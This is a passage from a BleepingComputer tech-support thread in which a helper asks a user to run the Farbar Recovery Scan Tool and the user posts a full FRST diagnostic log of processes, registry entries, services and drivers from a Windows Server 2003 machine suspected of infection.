  • Upon completing the above steps and posting a reply, another staff member will review your topic and do their best to resolve your issues.

Thank you for your patience, and again sorry for the delay.

***************************************************

We need to see some information about what is happening in your machine. Please perform the following scan again:

  • Download FRST by Farbar from the following link if you no longer have it available and save it to your destop.

    FRST Download Link

  • When you go to the above page, there will be 32-bit and 64-bit downloads available. Please click on the appropriate one for your version of Windows. If you are unsure as to whether your Windows is 32-bit or 64-bit, please see this tutorial.
  • Double click on the FRST icon and allow it to run.
  • Agree to the usage agreement and FRST will open. Do not make any changes and click on the Scan button.
  • Notepad will open with the results.
  • Post the new logs as explained in the prep guide.
  • Close the program window, and delete the program from your desktop.


As I am just a silly little program running on the BleepingComputer.com servers, please do not send me private messages as I do not know how to read and reply to them! Thanks!

#5 HelpBot

HelpBot

    Bleepin' Binary Bot


  • Bots
  • 12,578 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:36 AM

Posted 28 May 2017 - 06:45 PM

Hello again!

I haven't heard from you in 5 days. Therefore, I am going to assume that you no longer need our help, and close this topic.

If you do still need help, please send a Private Message to any Moderator within the next five days. Be sure to include a link to your topic in your Private Message.

Thank you for using Bleeping Computer, and have a great day!

 

Mod Edit:  Topic reopened per OP request rec'd via PM - Hamluis.


Edited by hamluis, 02 June 2017 - 09:38 AM.


#6 jtcote

jtcote
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:06:36 AM

Posted 02 June 2017 - 10:18 AM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14-05-2017
Ran by Administrator (administrator) on IVR02 (01-06-2017 17:06:27)
Running from C:\Documents and Settings\Administrator.ART\Desktop\tools
Loaded Profiles: Administrator & Administrator (Available Profiles: Administrator & Administrator)
Platform: Microsoft Windows Server 2003 Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 8 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

Failed to access process -> smss.exe
Failed to access process -> csrss.exe
Failed to access process -> winlogon.exe
Failed to access process -> services.exe
Failed to access process -> lsass.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> spoolsv.exe
Failed to access process -> msdtc.exe
Failed to access process -> casdscsvc.exe
Failed to access process -> UnivAgent.exe
Failed to access process -> svchost.exe
Failed to access process -> IPROSetMonitor.exe
Failed to access process -> Ofant.exe
Failed to access process -> svchost.exe
Failed to access process -> tvnserver.exe
Failed to access process -> vmware-converter-a.exe
Failed to access process -> dirwatcher.exe
Failed to access process -> vmware-converter.exe
Failed to access process -> vmware-converter.exe
Failed to access process -> svchost.exe
Failed to access process -> vssvc.exe
Failed to access process -> alg.exe
Failed to access process -> java.exe
Failed to access process -> AgPkiMon.exe
Failed to access process -> wmiprvse.exe
Failed to access process -> splunkweb.exe
Failed to access process -> splunkd.exe
Failed to access process -> csrss.exe
Failed to access process -> winlogon.exe
Failed to access process -> rdpclip.exe
Failed to access process -> explorer.exe
Failed to access process -> wmiprvse.exe
Failed to access process -> tvnserver.exe
Failed to access process -> ctfmon.exe
Failed to access process -> ctfmon.exe
Failed to access process -> vcs.exe
Failed to access process -> logon.scr
Failed to access process -> svchost.exe
Failed to access process -> rundll32.exe
Failed to access process -> cmd.exe
Failed to access process -> FRST64.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [tvncontrol] => C:\Program Files\TightVNC\tvnserver.exe [1725408 2017-03-14] (GlavSoft LLC.)
HKLM-x32\...\Winlogon: [Userinit] userinit,
Winlogon\Notify\crypt32chain: C:\WINDOWS\system32\crypt32.dll (Microsoft Corporation)
Winlogon\Notify\cryptnet: C:\WINDOWS\system32\cryptnet.dll (Microsoft Corporation)
Winlogon\Notify\cscdll: C:\WINDOWS\system32\cscdll.dll (Microsoft Corporation)
Winlogon\Notify\dimsntfy: C:\WINDOWS\system32\dimsntfy.dll (Microsoft Corporation)
Winlogon\Notify\ScCertProp: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\Schedule: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\sclgntfy: C:\WINDOWS\system32\sclgntfy.dll (Microsoft Corporation)
Winlogon\Notify\SensLogn: C:\WINDOWS\system32\WlNotify.dll (Microsoft Corporation)
Winlogon\Notify\termsrv: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\wlballoon: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\crypt32chain: C:\WINDOWS\system32\crypt32.dll [2015-06-26] (Microsoft Corporation)
Winlogon\Notify\cryptnet: C:\WINDOWS\system32\cryptnet.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\cscdll: C:\WINDOWS\system32\cscdll.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\dimsntfy: C:\WINDOWS\system32\dimsntfy.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\EFS: C:\WINDOWS\system32\sclgntfy.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\ScCertProp: C:\WINDOWS\system32\wlnotify.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\Schedule: C:\WINDOWS\system32\wlnotify.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\sclgntfy: C:\WINDOWS\system32\sclgntfy.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\SensLogn: C:\WINDOWS\system32\WlNotify.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\wlballoon: C:\WINDOWS\system32\wlnotify.dll [2007-02-18] (Microsoft Corporation)
HKLM\...\Policies\Explorer: [ShowSuperHidden] 1
HKLM\...\Command Processor:  <======= ATTENTION
HKLM-x32\...\Command Processor:  <======= ATTENTION
HKU\S-1-5-19\...\RunOnce: [tscuninstall] => C:\WINDOWS\system32\tscupgrd.exe [62464 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [tscuninstall] => C:\WINDOWS\system32\tscupgrd.exe [62464 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-21-2052111302-57989841-725345543-500\...\Run: [ctfmon.exe] => C:\WINDOWS\system32\ctfmon.exe [20992 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-21-2052111302-57989841-725345543-500\Control Panel\Desktop\\SCRNSAVE.EXE ->
HKU\S-1-5-21-2969604724-871335673-3114479108-1007\...\Run: [ctfmon.exe] => C:\WINDOWS\system32\ctfmon.exe [20992 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-21-2969604724-871335673-3114479108-1007\...\Policies\system: [DisableTaskMgr] 1
HKU\S-1-5-21-2969604724-871335673-3114479108-500\...\Run: [ctfmon.exe] => C:\WINDOWS\system32\ctfmon.exe [20992 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-21-2969604724-871335673-3114479108-500\Control Panel\Desktop\\SCRNSAVE.EXE ->
HKU\S-1-5-18\...\RunOnce: [tscuninstall] => C:\WINDOWS\system32\tscupgrd.exe [62464 2007-02-18] (Microsoft Corporation)
IFEO\Your Image File Name Here without a path: [Debugger] ntsd -d
Lsa: [Notification Packages] RASSFM KDCSVC WDIGEST scecli
SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll
SSODL: PostBootReminder - {7849596a-48ea-486e-8937-a2a3009f31a9} - %SystemRoot%\system32\SHELL32.dll (Microsoft Corporation)
SSODL: CDBurn - {fbeb8a05-beee-4442-804e-409d6c4515e9} - %SystemRoot%\system32\SHELL32.dll (Microsoft Corporation)
SSODL: SysTray - {35CEC8A3-2BE6-11D2-8773-92E220524153} - C:\WINDOWS\system32\stobject.dll (Microsoft Corporation)
SSODL-x32: PostBootReminder - {7849596a-48ea-486e-8937-a2a3009f31a9} - %SystemRoot%\syswow64\SHELL32.dll (Microsoft Corporation)
SSODL-x32: CDBurn - {fbeb8a05-beee-4442-804e-409d6c4515e9} - %SystemRoot%\syswow64\SHELL32.dll (Microsoft Corporation)
SSODL-x32: SysTray - {35CEC8A3-2BE6-11D2-8773-92E220524153} - C:\WINDOWS\SysWOW64\stobject.dll (Microsoft Corporation)
ShellExecuteHooks: URL Exec Hook - {AEB6717E-7E19-11d0-97EE-00C04FD91972} - C:\WINDOWS\system32\shell32.dll [10512384 2015-02-18] (Microsoft Corporation)
ShellExecuteHooks-x32: URL Exec Hook - {AEB6717E-7E19-11d0-97EE-00C04FD91972} - C:\WINDOWS\system32\shell32.dll [10512384 2015-02-18] (Microsoft Corporation)
Startup: C:\Documents and Settings\Administrator.ART\Start Menu\Programs\Startup\Prophecy System Tray.lnk [2013-11-14]
ShortcutTarget: Prophecy System Tray.lnk -> C:\Program Files\Voxeo\Prophecy\ProphecySysTray.exe (Voxeo Corporation)
Startup: C:\Documents and Settings\Administrator.ART\Start Menu\Programs\Startup\Prophecy System Tray.lnk [2013-11-14]
ShortcutTarget: Prophecy System Tray.lnk -> C:\Program Files\Voxeo\Prophecy\ProphecySysTray.exe (Voxeo Corporation)
BootExecute: autocheck autochk * sdnclean64.exe
GroupPolicy\User: Restriction <======= ATTENTION
GroupPolicyScripts: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{37dd8956-8de4-46d2-abc4-90098777d79b} <======= ATTENTION (Restriction - IP)
Winsock: Catalog5 03 C:\WINDOWS\SysWOW64\mswsock.dll [233472 2011-03-03] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5-x64 03 C:\Windows\System32\mswsock.dll [492544 2011-03-03] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Tcpip\..\Interfaces\{C3E0C66F-BDEA-43BB-85C9-E83C3F24C615}: [NameServer] 10.10.10.230,10.10.10.231

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-2052111302-57989841-725345543-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKU\S-1-5-21-2052111302-57989841-725345543-500\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-2969604724-871335673-3114479108-1007\Software\Microsoft\Internet Explorer\Main,Start Page = res://iesetup.dll/softAdmin.htm
HKU\S-1-5-21-2969604724-871335673-3114479108-500\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2969604724-871335673-3114479108-500\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
SearchScopes: HKU\S-1-5-21-2969604724-871335673-3114479108-1007 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://search.live.com/results.aspx?q={searchTerms}&src=IE-SearchBox&Form=IE8SRC
SearchScopes: HKU\S-1-5-21-2969604724-871335673-3114479108-500 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://search.live.com/results.aspx?q={searchTerms}&src=IE-SearchBox&Form=IE8SRC
Toolbar: HKU\S-1-5-21-2052111302-57989841-725345543-500 -> &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll [2015-04-08] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-2052111302-57989841-725345543-500 -> &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll [2015-02-18] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-2969604724-871335673-3114479108-500 -> &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll [2015-04-08] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-2969604724-871335673-3114479108-500 -> &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll [2015-02-18] (Microsoft Corporation)
Filter: Class Install Handler - {32B533BB-EDAE-11d0-BD5A-00AA00B92AF1} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: Class Install Handler - {32B533BB-EDAE-11d0-BD5A-00AA00B92AF1} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: lzdhtml - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: lzdhtml - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: text/webviewhtml - {733AC4CB-F1A4-11d0-B951-00A0C90312E1} - C:\WINDOWS\system32\SHELL32.dll [2015-02-18] (Microsoft Corporation)
Filter-x32: text/webviewhtml - {733AC4CB-F1A4-11d0-B951-00A0C90312E1} - C:\WINDOWS\syswow64\SHELL32.dll [2015-02-18] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: tw6axcd9.default
FF ProfilePath: C:\Documents and Settings\Administrator.ART\Application Data\Mozilla\Firefox\Profiles\tw6axcd9.default [2017-06-01]
FF Plugin: @t.garena.com/garenatalk -> C:\Program Files (x86)\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF Plugin HKU\S-1-5-21-2052111302-57989841-725345543-500: @citrixonline.com/appdetectorplugin -> C:\Documents and Settings\Administrator.ART\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll [2013-12-20] (Citrix Online)

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AeLookupSvc; C:\WINDOWS\SysWOW64\aelupsvc.dll [26624 2007-02-18] (Microsoft Corporation)
S4 Alerter; C:\WINDOWS\system32\alrsvc.dll [29696 2007-02-18] (Microsoft Corporation)
R2 AudioSrv; C:\WINDOWS\SysWOW64\audiosrv.dll [41472 2007-02-18] (Microsoft Corporation)
R2 Browser; C:\WINDOWS\SysWOW64\browser.dll [78336 2012-09-12] (Microsoft Corporation)
R2 CASDiscovery; C:\Program Files (x86)\CA\SharedComponents\ARCserve Backup\CADS\casdscsvc.exe [439624 2011-11-21] (CA)
R2 CASUniversalAgent; C:\Program Files\CA\SharedComponents\ARCserve Backup\UniAgent\UnivAgent.exe [1063240 2011-11-21] (CA)
S4 ClipSrv; C:\WINDOWS\system32\clipsrv.exe [49664 2007-02-18] (Microsoft Corporation)
S4 ClipSrv; C:\WINDOWS\SysWOW64\clipsrv.exe [32256 2007-02-18] (Microsoft Corporation)
S3 Dfs; C:\WINDOWS\system32\Dfssvc.exe [321024 2007-02-18] (Microsoft Corporation)
S3 Dfs; C:\WINDOWS\SysWOW64\Dfssvc.exe [164864 2007-02-18] (Microsoft Corporation)
S3 dmadmin; C:\WINDOWS\System32\dmadmin.exe [399872 2007-02-18] (Microsoft Corporation)
R2 dmserver; C:\WINDOWS\System32\dmserver.dll [37376 2007-02-18] (Microsoft Corporation)
R2 Dnscache; C:\WINDOWS\SysWOW64\dnsrslvr.dll [45568 2011-03-03] (Microsoft Corporation)
R2 ERSvc; C:\WINDOWS\System32\ersvc.dll [31744 2007-02-18] (Microsoft Corporation)
R2 Eventlog; C:\WINDOWS\system32\services.exe [227840 2009-03-19] (Microsoft Corporation)
R2 helpsvc; C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll [77312 2007-02-18] (Microsoft Corporation)
S3 HTTPFilter; C:\WINDOWS\System32\w3ssl.dll [21504 2007-02-18] (Microsoft Corporation)
S3 HTTPFilter; C:\WINDOWS\SysWOW64\w3ssl.dll [15360 2007-02-18] (Microsoft Corporation)
S3 IASJet; C:\WINDOWS\SysWOW64\iasrecst.dll [162816 2007-02-18] (Microsoft Corporation)
S4 ImapiService; C:\WINDOWS\system32\imapi.exe [265728 2007-02-18] (Microsoft Corporation)
S2 Iprip; C:\WINDOWS\Temp\ntshrui.dll [6656 2007-02-18] (Microsoft Corporation)
S4 IsmServ; C:\WINDOWS\System32\ismserv.exe [60416 2007-02-18] (Microsoft Corporation)
S4 IsmServ; C:\WINDOWS\SysWOW64\ismserv.exe [40448 2007-02-18] (Microsoft Corporation)
S4 kdc; C:\WINDOWS\System32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
S4 LicenseService; C:\WINDOWS\System32\llssrv.exe [191488 2007-02-18] (Microsoft Corporation)
S4 LicenseService; C:\WINDOWS\SysWOW64\llssrv.exe [94720 2007-02-18] (Microsoft Corporation)
R2 LmHosts; C:\WINDOWS\SysWOW64\lmhsvc.dll [19968 2007-02-18] (Microsoft Corporation)
S4 mnmsrvc; C:\WINDOWS\SysWOW64\mnmsrvc.exe [32768 2007-02-18] (Microsoft Corporation)
S4 NetDDE; C:\WINDOWS\system32\netdde.exe [160768 2007-02-18] (Microsoft Corporation)
S4 NetDDE; C:\WINDOWS\SysWOW64\netdde.exe [110080 2007-02-18] (Microsoft Corporation)
S4 NetDDEdsdm; C:\WINDOWS\system32\netdde.exe [160768 2007-02-18] (Microsoft Corporation)
S4 NetDDEdsdm; C:\WINDOWS\SysWOW64\netdde.exe [110080 2007-02-18] (Microsoft Corporation)
R3 Netman; C:\WINDOWS\SysWOW64\netman.dll [263680 2007-02-18] (Microsoft Corporation)
R3 Nla; C:\WINDOWS\System32\mswsock.dll [492544 2011-03-03] (Microsoft Corporation)
R3 Nla; C:\WINDOWS\SysWOW64\mswsock.dll [233472 2011-03-03] (Microsoft Corporation)
S3 NtFrs; C:\WINDOWS\system32\ntfrs.exe [1158144 2007-02-18] (Microsoft Corporation)
S3 NtFrs; C:\WINDOWS\SysWOW64\ntfrs.exe [792064 2007-02-18] (Microsoft Corporation)
S3 NtLmSsp; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
R2 OpenFileAgent; C:\Program Files (x86)\CA\ARCserve Backup Agent for Open Files\Ofant.exe [148808 2011-11-21] (CA)
R2 PlugPlay; C:\WINDOWS\system32\services.exe [227840 2009-03-19] (Microsoft Corporation)
R2 PolicyAgent; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
R3 RasMan; C:\WINDOWS\SysWOW64\rasmans.dll [181760 2007-02-18] (Microsoft Corporation)
S3 RDSessMgr; C:\WINDOWS\system32\sessmgr.exe [212480 2007-02-18] (Microsoft Corporation)
R2 RemoteRegistry; C:\WINDOWS\SysWOW64\regsvc.dll [69120 2007-02-18] (Microsoft Corporation)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)
S3 RSoPProv; C:\WINDOWS\system32\RSoPProv.exe [103424 2007-02-18] (Microsoft Corporation)
S3 RSoPProv; C:\WINDOWS\SysWOW64\RSoPProv.exe [67072 2007-02-18] (Microsoft Corporation)
S3 SCardSvr; C:\WINDOWS\System32\SCardSvr.exe [166400 2007-02-18] (Microsoft Corporation)
S3 SCardSvr; C:\WINDOWS\SysWOW64\SCardSvr.exe [90112 2007-02-18] (Microsoft Corporation)
R2 Schedule; C:\WINDOWS\SysWOW64\schedsvc.dll [202240 2007-02-18] (Microsoft Corporation)
R2 seclogon; C:\WINDOWS\SysWOW64\seclogon.dll [18432 2007-02-18] (Microsoft Corporation)
S4 stisvc; C:\WINDOWS\SysWOW64\wiaservc.dll [348160 2007-02-18] (Microsoft Corporation)
S2 SysmonLog; C:\WINDOWS\system32\smlogsvc.exe [133120 2007-02-18] (Microsoft Corporation)
S2 SysmonLog; C:\WINDOWS\SysWOW64\smlogsvc.exe [96256 2007-02-18] (Microsoft Corporation)
S4 TlntSvr; C:\WINDOWS\system32\tlntsvr.exe [113152 2007-02-18] (Microsoft Corporation)
R2 TrkWks; C:\WINDOWS\SysWOW64\trkwks.dll [86528 2007-02-18] (Microsoft Corporation)
S4 Tssdis; C:\WINDOWS\System32\tssdis.exe [99840 2007-02-18] (Microsoft Corporation)
R2 tvnserver; C:\Program Files\TightVNC\tvnserver.exe [1725408 2017-03-14] (GlavSoft LLC.)
S3 UMWdf; C:\WINDOWS\system32\wdfmgr.exe [62976 2007-02-18] (Microsoft Corporation)
S3 UMWdf; C:\WINDOWS\SysWOW64\wdfmgr.exe [39424 2007-02-18] (Microsoft Corporation)
S3 UPS; C:\WINDOWS\System32\ups.exe [34816 2007-02-18] (Microsoft Corporation)
S3 UPS; C:\WINDOWS\SysWOW64\ups.exe [16896 2007-02-18] (Microsoft Corporation)
R2 vmware-converter-agent; C:\Program Files (x86)\VMware\VMware vCenter Converter Standalone\vmware-converter-a.exe [479960 2014-10-03] (VMware, Inc.)
R2 vmware-converter-server; C:\Program Files (x86)\VMware\VMware vCenter Converter Standalone\vmware-converter.exe [479960 2014-10-03] (VMware, Inc.)
R2 vmware-converter-worker; C:\Program Files (x86)\VMware\VMware vCenter Converter Standalone\vmware-converter.exe [479960 2014-10-03] (VMware, Inc.)
R3 vphone; C:\Program Files\Voxeo\Prophecy\Prophecy.exe [340992 2013-07-18] (Voxeo Corporation) [File not signed]
R3 vprism; C:\Program Files\Voxeo\Prophecy\Prophecy.exe [340992 2013-07-18] (Voxeo Corporation) [File not signed]
R3 vserver; C:\Program Files\Voxeo\Prophecy\Prophecy.exe [340992 2013-07-18] (Voxeo Corporation) [File not signed]
R2 W32Time; C:\WINDOWS\SysWOW64\w32time.dll [227328 2007-02-18] (Microsoft Corporation)
S3 WmdmPmSN; C:\WINDOWS\SysWOW64\mspmsnsv.dll [25088 2007-02-18] (Microsoft Corporation)
R2 wuauserv; C:\WINDOWS\system32\wuauserv.dll [12288 2007-02-18] (Microsoft Corporation)
R2 WZCSVC; C:\WINDOWS\System32\wzcsvc.dll [659968 2007-02-18] (Microsoft Corporation)
R2 WZCSVC; C:\WINDOWS\SysWOW64\wzcsvc.dll [489472 2007-02-18] (Microsoft Corporation)
S4 appmgmt; C:\Documents and Settings\All Users\Application Data\Storm\update\%SESSIONNAME%\vndtf.cc3 [X]
R3 WinHttpAutoProxySvc; winhttp.dll [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 Abiosdsk; no ImagePath
S4 ACPIEC; C:\Windows\System32\Drivers\ACPIEC.sys [18432 2007-02-18] (Microsoft Corporation)
S4 adpu160m; no ImagePath
S4 adpu320; no ImagePath
S4 aic78u2; no ImagePath
S4 aic78xx; no ImagePath
S4 AliIde; no ImagePath
S4 AmdIde; no ImagePath
S4 arc; no ImagePath
S4 Atdisk; no ImagePath
S3 Atmarpc; C:\WINDOWS\System32\DRIVERS\atmarpc.sys [106496 2007-02-18] (Microsoft Corporation)
R3 audstub; C:\WINDOWS\System32\DRIVERS\audstub.sys [5632 2005-03-24] (Microsoft Corporation)
S3 bmdrvr; C:\Windows\SysWow64\drivers\bmdrvr.sys [75344 2013-08-28] (VMware, Inc.)
R2 CdaC15BA; C:\WINDOWS\System32\DRIVERS\CdaC15BA.sys [13312 2007-02-18] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.)
R2 CdaD10BA; C:\WINDOWS\System32\DRIVERS\CdaD10BA.sys [13312 2007-02-18] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.)
S1 Changer; no ImagePath
S4 ClusDisk; C:\WINDOWS\System32\DRIVERS\ClusDisk.sys [112640 2007-02-18] (Microsoft Corporation)
S4 CmdIde; no ImagePath
S4 cpqcissm; no ImagePath
R0 DfsDriver; C:\WINDOWS\System32\drivers\Dfs.sys [52736 2007-02-18] (Microsoft Corporation)
S4 dmboot; C:\WINDOWS\System32\drivers\dmboot.sys [415232 2007-02-18] (Microsoft Corporation)
R0 dmio; C:\WINDOWS\System32\drivers\dmio.sys [244224 2007-02-18] (Microsoft Corporation)
R0 dmload; C:\WINDOWS\System32\drivers\dmload.sys [9216 2007-02-18] (Microsoft Corporation)
S4 dpti2o; no ImagePath
R3 e1express; C:\WINDOWS\System32\DRIVERS\e1e5132e.sys [349568 2012-10-30] (Intel Corporation)
S4 elxstor; no ImagePath
R1 Fips; C:\Windows\System32\Drivers\Fips.sys [50176 2007-02-18] (Microsoft Corporation)
R0 Ftdisk; C:\WINDOWS\System32\DRIVERS\ftdisk.sys [240128 2007-02-18] (Microsoft Corporation)
R3 Gpc; C:\WINDOWS\System32\DRIVERS\msgpc.sys [71168 2007-02-18] (Microsoft Corporation)
S4 hpcisss; no ImagePath
S1 i2omgmt; no ImagePath
S4 iirsp; no ImagePath
S1 imapi; C:\WINDOWS\System32\DRIVERS\imapi.sys [72704 2007-02-18] (Microsoft Corporation)
S4 IntelIde; no ImagePath
R0 ioatdma; C:\WINDOWS\System32\Drivers\ioatdma.sys [46792 2009-11-16] (Intel Corporation)
S3 Ip6Fw; C:\WINDOWS\System32\DRIVERS\Ip6Fw.sys [57856 2007-02-18] (Microsoft Corporation)
R1 IPSec; C:\WINDOWS\System32\DRIVERS\ipsec.sys [156672 2007-02-18] (Microsoft Corporation)
U3 LicenseInfo; no ImagePath
S4 lp6nds35; no ImagePath
S1 mbamchameleon; C:\WINDOWS\system32\drivers\mbamchameleon.sys [121560 2017-05-18] (Malwarebytes)
R1 mnmdd; C:\Windows\System32\Drivers\mnmdd.sys [8192 2007-02-18] (Microsoft Corporation)
S4 mraid35x; no ImagePath
S4 nfrd960; no ImagePath
R2 NPF; C:\WINDOWS\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)
R2 OFADriver; C:\WINDOWS\system32\drivers\ofant.sys [187984 2011-11-21] (CA)
S3 PDCOMP; no ImagePath
S3 PDFRAME; no ImagePath
S3 PDRELI; no ImagePath
S3 PDRFRAME; no ImagePath
R3 Ptilink; C:\WINDOWS\System32\DRIVERS\ptilink.sys [31232 2007-02-18] (Parallel Technologies, Inc.)
S4 ql2300; no ImagePath
R3 Raspti; C:\WINDOWS\System32\DRIVERS\raspti.sys [31232 2007-02-18] (Microsoft Corporation)
S1 redbook; C:\WINDOWS\System32\DRIVERS\redbook.sys [64000 2005-03-24] (Microsoft Corporation)
U5 sacdrv; C:\Windows\System32\Drivers\sacdrv.sys [130560 2007-02-18] (Microsoft Corporation)
U5 ScsiPort; C:\WINDOWS\system32\drivers\scsiport.sys [171008 2007-02-18] (Microsoft Corporation)
S4 Simbad; no ImagePath
S4 symc8xx; no ImagePath
S4 symmpi; no ImagePath
S4 sym_hi; no ImagePath
S4 sym_u3; no ImagePath
S4 TosIde; no ImagePath
S4 ultra; no ImagePath
R3 Update; C:\WINDOWS\System32\DRIVERS\update.sys [152576 2007-05-30] (Microsoft Corporation)
S4 ViaIde; no ImagePath
R2 vstor2-mntapi20-shared; C:\Windows\SysWow64\drivers\vstor2-mntapi20-shared.sys [33872 2013-08-28] (VMware, Inc.)
S3 WDICA; no ImagePath
S3 WLBS; C:\WINDOWS\System32\DRIVERS\wlbs.sys [280576 2007-02-18] (Microsoft Corporation)
R1 ZAM; C:\WINDOWS\System32\drivers\zam64.sys [203680 2017-05-15] (Zemana Ltd.)
R1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard64.sys [203680 2017-05-15] (Zemana Ltd.)
S3 efavdrv; \??\C:\WINDOWS\system32\drivers\efavdrv.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
U1 WS2IFSL; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

NETSVC: Sacsvr -> no filepath.
NETSVC: TrkSvr -> no filepath.
NETSVCx32: Browser -> C:\Windows\SysWOW64\browser.dll (Microsoft Corporation)
NETSVCx32: CryptSvc -> C:\Windows\SysWOW64\cryptsvc.dll (Microsoft Corporation)
